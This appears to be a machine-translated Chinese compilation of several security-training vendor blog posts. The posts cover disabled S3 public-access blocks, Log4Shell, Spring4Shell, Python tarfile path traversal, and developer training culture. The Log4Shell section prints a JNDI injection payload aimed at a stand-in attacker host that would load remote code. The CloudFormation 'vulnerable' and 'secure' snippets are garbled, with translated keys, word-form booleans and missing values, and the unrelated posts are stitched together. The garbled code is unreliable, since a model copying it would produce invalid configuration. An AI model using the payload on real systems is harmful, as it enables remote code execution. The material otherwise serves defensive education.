安全代码见解

如今，网络安全威胁无处不在，持续不断。随着我们生活中越来越多的方面被数字化，网络犯罪分子面临的风险就越高——有太多代码无法保证安全，私人数据也太有价值了。而且，好吧，在部署程序后试图跟上并防御攻击面的各个方面几乎是不可能的。

某些方法可缓解部分症状，当精明的组织采纳基础设施即代码（IaC）理念时，其中一种方法便显而易见。当然，如同任何开发工作，存在若干安全陷阱需要解决。而且，由于开发人员正在研究生成用于托管应用程序的重要基础设施代码，因此安全意识在流程的每个阶段都至关重要。

那么，初次接触云服务器环境的开发人员究竟该如何提升技能、学习技能，并在增强安全意识的前提下进行构建呢？我们创建了《Coders Conquer Security》系列的下一部内容，旨在解决常见的IaC漏洞。接下来的几篇博客将重点介绍您（开发人员）可采取的步骤，开始在自己的组织中以代码形式部署安全基础设施。

让我们开始吧。

美国旧西部流传着一个寓言，讲述了一个偏执狂的故事。他坚信土匪会袭击并抢劫他的家园。为此，他投资了各种安全措施，例如安装了超坚固的前门，登上了所有的窗户，以及将大量枪支放在触手可及的地方。有一天晚上他在睡觉的时候还被抢劫了，因为他忘记锁侧门。土匪只是找到了失效的保安人员，并迅速利用了这种情况。

在基础架构中禁用安全功能就像这样。即使您的网络拥有强大的安全基础架构，如果禁用了某些元素，也无济于事。

在我们潜入之前，让我提出一个挑战：

访问上述链接，您将进入我们的游戏化培训平台，可立即尝试攻破禁用的安全功能漏洞。（请注意：该平台将在Kubernetes环境中启动，但您可通过下拉菜单选择Docker、CloudFormation、Terraform或Ansible进行操作）。

你做得怎么样？如果你还有一些工作要做，请继续阅读：

安全功能可能因各种原因被禁用。对于某些应用程序和框架，它们可能在默认情况下处于禁用状态，必须先开启才能开始运行。管理员也可能禁用特定安全功能，以便更轻松地执行某些任务，而不会频繁受到挑战或封锁（例如公开AWS S3存储桶）。任务完成后，他们可能忘记重新启用那些被禁用的功能。他们可能更愿意将其关闭，以便将来更轻松地完成工作。

为什么禁用的安全功能如此危险

禁用一项或多项安全功能是不妥的，原因有二。首先，安全功能被部署在基础设施资源中，旨在防范已知的漏洞、威胁或缺陷。若将其禁用，则无法为您的资源提供保护。

攻击者总是会首先尝试找到易于利用的漏洞，甚至可能使用脚本修复常见漏洞。这与小偷检查街上所有汽车以查看是否有门被解锁没什么不同——这比砸窗户容易得多。黑客可能会惊讶地发现常见的安全防御措施处于非活动状态。但当这种情况发生时，他们很快就会利用它。

其次，设置良好的安全性后再禁用会产生虚假的安全感。如果管理员不知道有人禁用了这些防御措施，他们可能会认为自己能够免受常见威胁的侵害。

作为攻击者如何利用已禁用的安全功能的示例，可以考虑阻止公有访问的 AWS S3 安全功能。借助 Amazon S3 屏蔽公有访问权限，账户管理员和存储桶所有者可以轻松设置集中控制来限制对其 Amazon S3 资源的公开访问。然而，部分管理员在访问 S3 存储桶时遇到问题，为尽快完成任务而决定将其公开。若他们忘记启用该安全功能，攻击者将完全访问存储在该 S3 存储桶中的信息，这不仅会导致信息泄露，还会因数据传输费用产生额外开销。

让我们比较一些现实世界的代码；看看以下 CloudFormation 片段：

易受攻击：

企业存储桶：
类型：AWS::S3::Bucket
属性：
公共访问区块配置：
blockPublicACLS：错误
BlockPublicy：错误
ignorepublicacls：错误
restrictPublicBuckets：
版本控制配置：
状态：已启用
存储桶加密：
服务器端加密配置：
-默认情况下服务器端加密：
SSE算法：“AES256”

安全：

企业存储桶：
类型：AWS::S3::Bucket
属性：
公共访问区块配置：
blockPublicACLS：对
BlockPublicy：没错
ignoreRepublicacls：
restrictPublicBuckets：
版本控制配置：
状态：已启用
存储桶加密：
服务器端加密配置：
-默认情况下服务器端加密：
SSE算法：“AES256”

防止禁用安全功能

阻止禁用的安全功能对您的组织造成负面损害既是政策问题，也是实践问题。应制定一项坚定政策，规定只有在非常特殊的情况下才能禁用安全功能。必须记录因解决问题或更新应用程序而需临时禁用功能的事件。所需工作完成后，应检查功能以确保已完全重新激活。

如果必须永久禁用安全功能以简化操作，则应为受影响的数据提供其他保护措施，以确保在没有默认保护的情况下，黑客将无法访问该功能。如果所需的保护功能已被禁用，那么攻击者找到未锁定的门并利用这种情况只是时间问题。

了解更多，挑战自我：

来看看安全代码勇士博客页面，详细了解此漏洞以及如何保护您的组织和客户免受其他安全漏洞和漏洞的破坏。

现在你已经阅读了这篇文章，准备好发现并修复这个漏洞了吗？Secure Code Warrior 尝试iMac游戏化安全挑战 Secure Code Warrior 让您的所有网络安全技能持续精进并保持最新状态。

这是每周一次的系列文章，涵盖了我们排名前八的“基础设施即代码”漏洞；下周回来查看更多信息！

之前的一篇博客文章描述了Java的陷阱 “按位运算符与布尔运算符”。

• Java 陷阱-按位运算符与布尔运算符

我们在一个名为 “Challenge The Sensei” 的有趣小测验中加入了这个变体以及其他一些 Java 陷阱。

• scw.typeform.com/to/rgw7q7oe

如果你已经阅读了上面的博客文章，那么你将是回答至少一个问题的好地方。

但是你的朋友可能不会，所以如果你觉得测验很有趣，你可以与他们分享，看看他们的分数是否和你一样。

因为我们不想只问你。我们想尝试用它来帮助教育和编纂知识。因此，我们创建了一个 Github 存储库，其中包含问题和解决方案的可运行代码示例。

• github.com/secureCodeWarrior/Challenge-the-

这是一个 老师 已启用 repo。

当你克隆仓库并将其加载到 IntelliJ 时，假设你有 Secure Code Warrior 老师 安装了 IntelliJ 插件，它会自动看到你有一个 .sensei 文件夹，然后加载了 Sensei 食谱。

在 IDE 中浏览代码时，你应该看到 IntelliJ 提示你代码中存在错误，这应该可以更容易地看到代码中的问题：

• 将鼠标悬停在突出显示的代码上然后你会看到一条提示你错误的提示
• 使用 “显示上下文操作” 键：alt+Enter（Windows）选项+回车键（macOS），我们可能会有可以修复代码的 QuickFix。

添加了 Sensei 食谱，用于：

• 按位运算符
• 拆分 IP 地址
• 断言订单

我们将来会添加更多的配方和更多的解释性文本，以涵盖其余的代码... 但不要让这阻止你自己查看代码并发现错误。

记得试试测验然后”挑战老师“

12 月 9 日，Java 库 Log4j 中的一个为期 0 天的漏洞被披露。 CVE-44228，配音 Log4Shell，由于该漏洞可能导致远程代码执行，因此获得了 “高严重性” 评级（竞赛）。此外，log4j-core 是最常用的 Java 日志库之一，因此它使数百万个应用程序处于危险之中。

想快速提升你处理 Log4Shell 的技能吗？

我们已经建立了一个展示柜，带你从Log4Shell的基本概念到在一个名为Mission的模拟器中体验利用这个漏洞的漏洞。在本任务中，我们将引导您了解 Log4j 漏洞如何影响您的基础架构和应用程序。 点击此处直接进入展示柜，或者继续阅读以详细了解该漏洞。

老新闻？

这种漏洞并不是什么新鲜事物。安全研究人员已经在 2016 年的 BlackHat 演讲中 阿尔瓦罗·穆尼奥斯和奥列克桑德·米罗什 强调了这一点”应用程序不应使用不可信的数据执行 JNDI 查询”，并说明了有针对性的 JNDI/LDAP 注入如何导致远程代码执行。而这正是 Log4Shell 的核心。

攻击向量

Log4Shell 的注入负载如下所示：

$ {jndi: ldap: //attacker.host/xyz}

要理解这一点，我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式： $ {expr} 将在运行时进行评估。例如，$ {java: version} 将返回正在使用的 Java 版本。

接下来是 JNDI，或 Java 命名和目录接口，这是一个 API，允许使用 LDAP、DNS、RMI 等协议连接服务以检索数据或资源。简而言之，在上面的恶意负载示例中，JNDI 对攻击者控制的 LDAP 服务器执行查询。例如，它的响应可能指向包含恶意代码的 Java 类文件，作为回报，该文件将在易受攻击的服务器上执行。

该漏洞之所以如此成问题，是因为Log4j会评估所有日志条目，并将对所有以 “jndi” 为前缀的 EL 语法编写的已记录用户输入进行查询。可以将有效负载注入用户可以输入数据的任何地方，例如表单字段。另外，HTTP 标头，例如 用户代理 和 X 向前移动，以及其他标头，可以自定义以携带有效载荷。

要亲自体验漏洞， 前往我们的展示区，跳入第 2 步—— “体验影响力”。

预防：意识

建议对所有应用程序进行升级，因为 Log4j 一直在修补易受攻击的代码。但是，2.15.0和2.16.0版本包含DDoS和其他漏洞，这意味着从12月下旬开始，建议升级到2.17.0。

在开发人员编写代码时，我们需要始终考虑安全性。Log4Shell 告诉我们，使用第三方框架或库会带来风险。我们需要意识到这样一个事实，即使用外部资源可能会损害我们的应用程序的安全性，而我们天真地认为外部资源是安全的。

这个漏洞可以预防吗？是和不是。一方面，只有通过第三方软件引入易受攻击的组件，开发人员才能做更多的事情。另一方面，从中吸取的教训是一遍又一遍地重复的，即永远不要相信用户的输入。

Secure Code Warrior认为，具有安全意识的开发人员是防止代码漏洞发生的最佳方法。由于 SCW 大规模提供特定编程框架的培训，因此企业客户能够利用报告数据快速找到受影响的 Java 开发人员是谁。他们还依靠受过 SCW 培训的安全支持者来加速 Log4j 的升级。

特别是 Java 开发者，Secure Code Warrior 提供了 Sensei，一款免费的 IntelliJ 插件。这种基于规则的代码分析工具可用于强制执行编码指南，以及预防和修复漏洞。您可以创建自己的规则，也可以使用我们的现成规则 食谱。浏览我们的 食谱，别忘了下载我们的 Log4j 食谱 这将帮助你在眨眼之间找到并修复 Log4Shell 漏洞。

提升你防御 Log4Shell 的技能

有兴趣将你在这篇博客文章中学到的东西付诸实践吗？我们的展示柜可以为您提供帮助。在展示开始时，您将快速查看此漏洞，然后将带您进入模拟环境，在那里您可以根据指导性说明尝试漏洞。

‍

最近，作为 Java 社区中最受欢迎的库之一 Spring 库披露了两个与远程代码执行 (RCE) 相关的漏洞。为了帮助您更轻松地了解自己是否面临漏洞风险以及应采取哪些措施，我们对 “Spring4Shell” 和 “Spring Cloud Function” 的已知详细信息进行了细分。

漏洞 1-“Spring4Shell” (CVE-2022-22965)

2022年3月29日，该社区发现了一系列推文，其中包含针对Spring Core（SC）的漏洞概念验证的屏幕截图，该漏洞允许远程执行所有版本的Spring Core代码，包括最近发布的版本5.3.17。

哪些应用程序面临风险？

目前，只有托管在Tomcat上的应用程序才被证实存在这种新漏洞的风险。尽管针对嵌入式 Tomcat Servlet 容器或任何其他非 Tomcat 托管应用程序的攻击尚未被证明是成功的，但这并不排除将来这些框架成功使用威胁的可能性。

春季发布了官方 声明 关于该漏洞，根据目前对该漏洞的理解，该漏洞阐明了需要满足以下条件才能受到攻击：

• JDK 9 或更高版本
• Apache Tomcat 作为 Servlet 容器
• 打包成传统 WAR（与 Spring Boot 可执行文件 jar 相反）
• Spring-webmvc 或 spring-webflux 依赖关系
• Spring Framework 版本 5.3.0 到 5.3.17、5.2.0 到 5.2.19 以及更早的版本

“Spring4Shell” 漏洞是如何运作的？

该漏洞依赖于在方法签名中使用普通旧 Java 对象 (POJO) 的请求中使用 “数据绑定”（org.springframework.web.bind.Web.bind.WebDataBinder）：

其中 Foo 类是一个 POJO 类，可以定义如下。请注意，实际的类并不重要，只要它由类加载器加载即可。

当请求由这样的方法处理时，类加载器用于解析该类。类加载器负责在运行时加载类，而不必先将所有可能的类型预加载到内存中。它会计算出使用新类时要加载哪个.jar 文件。

您可以直接从Spring上找到有关此漏洞的最新和深入的信息 博客文章，包括潜在的修复或变通方法。

漏洞 2-Spring Cloud 函数 (CVE-2022-22963)

2022年3月27日，Cyber Kendra披露了有关Spring Cloud Functions中一个为期0天的远程代码执行（RCE）漏洞的详细信息，该漏洞尚无补丁。漏洞被分配了 ID CVE-2022-22963：Spring 表达式资源访问漏洞。

哪些应用程序面临风险？

该漏洞影响了以下条件下的应用程序：

• JDK 9 或更高版本
• Spring Cloud Functions 版本 3.1.6（或更低版本）、3.2.2（或更低版本）或任何不支持的版本

剥削是如何运作的？

Spring Cloud Function 使开发人员能够通过属性 spring.cloud.function.routing-expression 配置如何处理路由，通常通过配置或代码来完成。这是一种接受 “Spring 表达语言” (SpEL) 的强大功能。通过这个为期 0 天的漏洞，我们了解到该属性可以通过请求的 HTTP 标头进行设置，这意味着攻击者可以将 SpEL 代码直接嵌入到其 RoutingFunction 端点的 HTTP 请求中，从而执行任意代码。

用户应采取哪些措施来降低风险？

春天有 已发布 版本 3.1.7 和 3.2.3 通过不允许通过 HTTP 标头设置此属性来解决此问题，从而缓解了漏洞。升级到任一版本后，无需执行其他步骤。

有兴趣进一步了解我们如何帮助开发人员编写更安全的代码吗？预订演示 或者浏览我们的免费安全编码指南 安全代码教练。

‍

资料来源

• https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
• https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/

‍

最近，一个小组 安全研究人员 宣布他们在 Python 的 tar 文件提取功能中发现了一个已有十五年历史的错误。该漏洞于 2007 年首次披露，追踪为 CVE-2007-4559。在 Python 官方文档中添加了一条注释，但错误本身没有修补。

该漏洞可能会影响成千上万的软件项目，但许多人不熟悉情况或如何处理。这就是为什么，在这里 安全代码勇士，我们为您提供了亲自模拟利用此漏洞的机会，以亲眼目睹其影响，并亲身体验这个持续错误的机制，这样您就可以更好地保护您的应用程序！

试试模拟 使命 现在。

漏洞：提取 tar 文件期间的路径遍历

当使用未经审查的用户输入来构造文件路径时，就会发生路径或目录遍历，从而允许攻击者获得访问权限和覆盖文件，甚至执行任意代码。

该漏洞存在于 Python 中 tarfile 模块。tar（磁带存档）文件是一个单一的文件，称为存档。它将多个文件及其元数据打包在一起，通常通过以下方式进行识别 .tar.gz 要么 .tgz 延期。存档中的每个成员都可以用一个来表示 TarInfo 对象，其中包含元数据，例如文件名、修改时间、所有权等。

风险来自于能够再次提取档案。

提取时，每个成员都需要写入路径。此位置是通过将基本路径与文件名连接起来创建的：

创建此路径后，它将传递给 tarfile.extra 要么 tarfile.extall 执行提取的函数：

这里的问题是缺乏对文件名的清理。攻击者可以重命名文件以包含路径遍历字符，例如 点点斜线 (../)，这将导致文件遍历出其本应所在的目录并覆盖任意文件。这最终可能导致远程代码执行，而利用的时机已经成熟。

如果您知道如何识别该漏洞，则该漏洞会出现在其他场景中。除了 Python 对 tar 文件的处理外，该漏洞还存在于 提取 zip 文件。你可能用另一个名字熟悉这个，比如 压缩文件漏洞，这已经体现在除了 Python 之外的语言中！

链接到任务 

如何降低风险？

尽管该漏洞已为人所知多年，但Python维护人员仍认为提取功能正在发挥作用 它应该做什么。在这种情况下，有人可能会说 “这是一项功能，不是错误”。不幸的是，开发人员不能总是避免从未知来源提取 tar 或 zip 文件。作为安全开发实践的一部分，他们有责任对不可信的输入进行清理，以防止路径遍历漏洞。

想更多地了解如何使用 Python 编写安全代码和降低风险？

试试我们的 免费的 Python 挑战赛。

如果你有兴趣获得更多免费编程指南，请查看 安全代码教练 帮助您掌握安全编码惯例。

‍

‍

米查·马丁内斯是美国Nelnet公司的网络安全分析师兼电影摄影师，该公司是一家经营学生贷款及教育金融服务的管理与偿还业务集团。当他负责为开发人员创建安全编码培训计划时，他采用了创新方式来激发团队兴趣。他对安全编码培训计划的运作方式给我们留下了深刻印象，因此我们与他深入交流以了解更多详情。

底线？

创建安全文化，在开发团队中培养内部安全拥护者，"成为善良的力量"。

通过专注于安全代码，我们帮助公司变得更强大、更安全。

在Nelnet，Micha和他的安全团队从一开始就认识到构建安全代码的重要性。他们希望以一种引人入胜、相关且有益的方式实现这一目标。他发现，通过识别对安全编码充满热情且技术娴熟的开发人员，并培养他们成为安全倡导者，这些拥护者便能成为整个安全培训思维模式的催化剂。这些人不仅指导需要点对点帮助的同事，更成为组织内部推动安全编码实践变革的领导者。

以下是Micha的更多内容，讲述了他和他的团队如何改变围绕安全防范的思维方式和文化，从而使他们的公司“更强大、更安全”。

一切都与吹牛权有关... 以及减少漏洞

米卡不会执行常规的安全培训计划。他利用竞争机制和摄影天赋使竞赛极具吸引力并取得成功。开发人员获得的是高度相关的实用知识，能够生成更强大的安全代码。

随着他们的产品变得更加安全并提供更高级别的软件漏洞保护，该企业也取得了胜利。学习软件安全性不一定是典型而无聊的学习体验，只不过是勾选复选框而已。开发人员希望获得身临其境且具有挑战性且与日常工作相关的培训体验。

观看迈克讲述他如何通过比赛让安全的编程训练变得有趣，包括以体能冠军腰带和摔角狂热作为奖品。要让他的团队将安全放在首位，只需要一场健康的竞争。

谁不喜欢吹牛的权利？

‍

拥抱以安全编码为中心的文化...这个工具还不够

米迦给我们留下了最后一个想法，即他为何Secure Code Warrior。该平台正是推动他建立预防文化和主动学习的工具。制定培训计划需要时间，还需对受过培训且表现优异的开发人员进行投资。需要一种变革性文化来培养每位开发人员掌握预防性安全编码方法的技能。

以下是来自 Micha 的更多内容，讲述了为什么拥抱安全编码文化会让Secure Code Warrior 。

Secure Code Warrior 。对演示感兴趣吗？在下面预订一张。

我们与Larry Maccherone坐下来探讨了安全问题，这位现代应用程序安全领域的领导者将代码分析和攻击防御直接嵌入到软件中。我们讨论了情境学习如何成功地培训开发人员掌握安全编码。

当今的开发人员越来越多地肩负着阻止明日网络安全漏洞的任务。虽然可以提供关于代码漏洞的培训，但通常以与开发人员日常工作无关的非吸引人的形式呈现。开发人员需要快速编写代码以满足客户需求，从而推迟培训等业务目标。更棘手的是，当这类培训脱离实际场景，以冗长演示或学习手册的形式呈现时，开发者往往难以看出额外投入能带来什么益处。

组织如何在不干扰开发人员日常职责或让他们远离首选工具和工作流程的情况下，向开发人员提供关键安全培训？

答案很简单。通过情境化学习，让开发人员触手可及地获取培训。Larry 在以下视频中探讨了它为何对开发人员如此强大。

通过在开发人员审查代码问题的同时整合培训机会，他们可以立即获得与所发现问题或漏洞最相关的信息。此外，由于培训是以更小且更易理解的块进行的，因此开发人员更有可能保留信息并防止将来使用易受攻击的代码。正如拉里所说，“反馈是学习的关键”。

最重要的是，开发人员需要在更短的时间内完成更多工作，并提供安全、高质量的代码。通过融入针对代码漏洞的情境化培训，它优化了开发人员的工作流程和体验，并提高了他们的留存率。听听 Larry 讲述如何节省这 40 小时的培训时间！

Secure Code Warrior ，为您的开发和安全团队提供情境化且高度相关的学习。

对演示感兴趣吗？在下面预订一张。

‍

软件开发生命周期（SDLC）似乎很无害；它是一个过程，我们这些软件人员一起创造了奇迹，并将所有这些社会不能缺少的数字产品运送出去。

除了......如果你曾经参与过一个软件开发项目，你就会知道这通常是一场战役，有许多任务要征服，有许多龙要杀死。这在一段时间内很有趣，但倦怠是真实的，对软件的需求使我们在最好的时候都以光速工作，尤其是开发团队。

现在想象一下，他们被抛出另一项必须完成的任务......负责他们所接触的项目元素的安全。这在最坏的情况下，可能会导致一些人的房子倒塌，但更现实的情况是，它根本没有被列为优先事项，而被认为更紧迫的问题会优先过关。当大多数开发人员没有接受过安全编码的培训时（特别是如果他们的经理也没有优先考虑安全问题的话），我们看到频繁的数据泄露，有缺陷的应用程序发布，以及一些严重的安全专业人员在错误的代码雪崩下达到崩溃的地步就不足为奇了。

开发人员需要一个AppSec的推行者。

当考虑到上述情况时，你可以理解为什么安全问题在编码过程中被放在 "太难 "的篮子里，而留给安全团队去解决。太多竞争性的最后期限，没有足够的培训，而且没有真正的理由在其他事情上关心安全问题。然而，对代码的需求实在太多，这种现状无法继续。而这正是超级精英开发人员可以从他们的同行中脱颖而出，学习新技能，最重要的是，建立更安全的代码。

然而，重要的是要记住，管理软件安全并不全在开发人员的肩上--这仍然是AppSec团队的领域（当他们与有安全意识的开发人员合作时，将有更多的喘息空间，而不是重复修复常见的错误）。一个有效的DevSecOps流程需要团队中的每个成员都能得到他们所需的支持和工具来分担安全责任，而正确的培训是最重要的。平衡正确的工具和培训套件需要AppSec专业人员的洞察力，他们愿意与开发人员密切合作，激励他们并推动积极的变化。

破坏性的培训比它的效果更令人讨厌，任何令开发者厌恶的东西都不会起作用。集成开发环境或问题跟踪器集成的解决方案是一种替代方案，它可以在需要的时候将正确的信息送到他们面前。

以下是它的实际工作情况。

及时，而不是 "以备不时之需"。

到目前为止，上下文的实践学习是最有效的培训方式，在最有意义的时候提供一口大小的块状内容。这有时被称为 "及时"（JiT）培训，对于学习安全编码的开发人员来说是非常有效的。

源于丰田的精益生产原则，JiT培训的目的是在需要了解的基础上，在最重要的时候激活。一个开发人员刚刚写的东西看起来有不适当的权限？如果一个小的后门被打开，允许攻击者远程执行代码呢？如果开发人员能够在需要的时候获取知识，而不是在Confluence中翻阅文档，或者在Google上搜索培训中提到的东西，那将会更令人难忘。

及时学习是 "以防万一 "的对立面；虽然后者是更常见的传授知识的方式，但它根本没有效率。我们必须让开发人员更容易参与到安全编码的最佳实践中来，并在保持对他们现在正在进行的关键目标的关注的同时，看到提高技能对他们的职业生涯的好处。

不要再让开发者追逐培训了。

我们已经知道在一个工作日里有太多的事情要做，因此，开发人员有什么动机要去教室上课，或者通过上下文切换来获得静态的理论培训？

普遍的共识是，无论大多数组织正在做什么，如果造成数据泄露的漏洞数量是什么的话，都不是非常有效的。Verizon公司的2020年数据泄露调查报告指出，43%的数据泄露可归因于网络漏洞。开发人员没有接受有效的培训；没有在高等教育中接受培训，也没有作为工作场所提高技能措施的一部分。如果他们接受了培训，像SQL注入和老式路径穿越这样的常见漏洞就不会被利用来获取大量数据，网络安全技能的短缺也不会失控。

所以，知道这是目前开发人员接受培训和熟悉安全的环境，为什么我们对糟糕的结果感到惊讶？这可能只是一个影响--一个积极的影响--对于开发者和组织来说，确保一个更顺畅、更综合、更不刺耳的培训体验，在他们实际工作的空间中，如Jira、GitHub和IDE中都可以获得。这个行业只需要向前发展，让安全意识变得更加容易，在这个环境中，安全意识不再是一种奢侈品。

准备好保障开发工作流程了吗？

具有安全意识的开发人员因其技能而备受推崇，他们在代码构建阶段就能为企业提供保护。安全不再是可有可无的东西，尤其是 GDPR 罚单、PCI-DSS 合规法规、NIST 治理......以及被起诉的可能性，就像 Equifax 那样，被提起数百万美元的集体诉讼。

一个综合的方法可能是催化剂，开始用较少的破坏性学习来赢得开发者，并为更深入的courses ，培训安全卫士，以及普遍激发我们需要的共同责任来保持世界的数据安全和健全。

现在就下载Jira和GitHub的整合工具，并让我们知道你的想法。

青少年安全研究员比尔·德米尔卡皮的最新报告揭露了其学校所用软件中的重大漏洞，这无疑唤起了某些回忆。我记得自己还是个充满好奇的孩子时，曾拆解软件底层代码，探究其运作机制，更重要的是想看看能否破解它。数十年来，软件工程师们始终致力于持续改进和强化产品，而安全社区（尽管有时手段略显厚颜）在发现缺陷和潜在灾难方面发挥着关键作用——但愿能在恶意分子之前发现这些漏洞。

然而问题在于，为回应他的发现，他遭到了临时停学处分。这发生在他耗尽所有私下联系公司（弗莱特公司）的途径后，最终选择进行一次相当公开的抨击，以表明自己的身份及其破坏系统的能力。他曾多次试图以合乎道德的方式警告弗莱特公司，却未获回应，而该软件至今仍存在漏洞，大量学生数据相当容易暴露，因为其中大部分数据是未加密的。

他还发现了另一家公司的软件：Blackboard中的漏洞。尽管Blackboard的数据至少经过了加密，但潜在的攻击者本可以再次入侵并窃取数百万条记录。他的学校同时使用了这款软件和富莱特的产品。

“邪恶黑客”的叙述是有问题的。

德米尔卡皮在今年DEFCON大会上展示了他的发现，他滑稽表演中更调皮的细节赢得了全场掌声。诚然，事实如此——据报道，福莱特公司对其工作表示感谢，并采纳了他的建议采取行动，最终使他们的软件更加安全，避免了成为又一起数据泄露事件的危机。尽管他最初处于不利地位，但最终成功化解了这场危机。高中毕业后，他还将进入罗切斯特理工学院深造，显然他正朝着成为一名备受追捧的安全专家的正确道路前进。

作为一名安全人员，很难不对这种情况的处理方式提出质疑。尽管最终结果尚可，但最初他被当作一个讨厌的剧本少年，把鼻子伸进了不该管的地方。谷歌对该事件的搜索结果中，有文章称他为"黑客"（在安全外行看来，这在许多方面都将他定位为反派），而实际上，他的方法（以及许多其他人的方法）有助于保护我们的数据安全。

我们需要有好奇心、聪明和注重安全的人来深入了解情况，而且我们需要更频繁地进行调查。截至七月，仅在今年，就有超过四十亿条记录暴露在恶意数据泄露事件中。由于8月份时尚和生活方式品牌Poshmark的破产，这个数字可能还要增加五千万条。

我们犯了同样的错误，更令人担忧的是，这些错误往往是诱发面部手掌的简单漏洞，不断使我们陷入困境。

跨站脚本攻击和 SQL 注入尚未消失。

据报道，有线、Demirkapi发现，Blackboards社区参与软件和Folletts学生信息系统存在常见的安全漏洞，例如跨站脚本（XSS）和SQL注入。这两个漏洞自20世纪90年代以来就一直是安全专家们津津乐道的话题。我们忍受它们的存在已经相当长一段时间了——真的，相当长一段时间，就像Hypercolor T恤和软盘一样，它们现在本该成为一段遥远的回忆。

然而事实并非如此，显然，没有足够多的开发人员具备足够的安全意识来阻止这些漏洞进入他们的代码。扫描工具和手动代码审查只能发挥有限的作用，而且还有比跨站脚本攻击和SQL注入复杂得多的安全问题，在这些情况下，这些昂贵且耗时的措施反而可能适得其反。

像比尔·德米尔卡皮这样的人应该激励开发人员创建更高标准的代码；年仅17岁的他通过威胁载体入侵了两个高流量系统，这些威胁载体本应在代码提交之前就被嗅出并予以纠正。

游戏化：参与的关键？

我写过很多关于开发人员为何基本不参与安全问题的文章，简短的答案是：在组织层面和教育层面，培养具有安全意识的开发人员方面都做得不够。当公司花时间建立一种奖励和认可参与度的安全文化时——包括实施符合开发者思维方式的培训，激励他们持续尝试——那些令人讨厌的漏洞残留就会开始从我们使用的软件中消失。

德米尔卡皮显然对安全领域有着课外兴趣，并花时间学习了如何逆向工程恶意软件、发现漏洞，以及如何破解从外部看似完好无损的东西。但在与他交谈时（以及通过他的DEF CON幻灯片），他对自己的自学经历发表了一个有趣的声明...他将其游戏化了：

“目标是在我校的软件中寻找某些东西，这是一种有趣的'游戏化'方式，可以自学大量渗透测试知识。尽管我最初研究的目的是了解更多，但最终发现情况比我预期的要糟糕得多，”他说。

尽管并非每个开发人员都希望专门研究安全性，但每个开发人员都应有机会提升安全意识。基础安全知识几乎是组织内部的"代码许可"，特别是对于那些掌控大量敏感数据的开发人员而言。如果每位开发人员都能在编写出最简单的安全漏洞之前就将其修复，那么对于那些企图造成严重破坏的人，我们的防御体系将更加稳固。

对游戏化训练感到好奇吗？点击此处查看我们的《程序员征服安全》系列 XSS 和 SQL注入。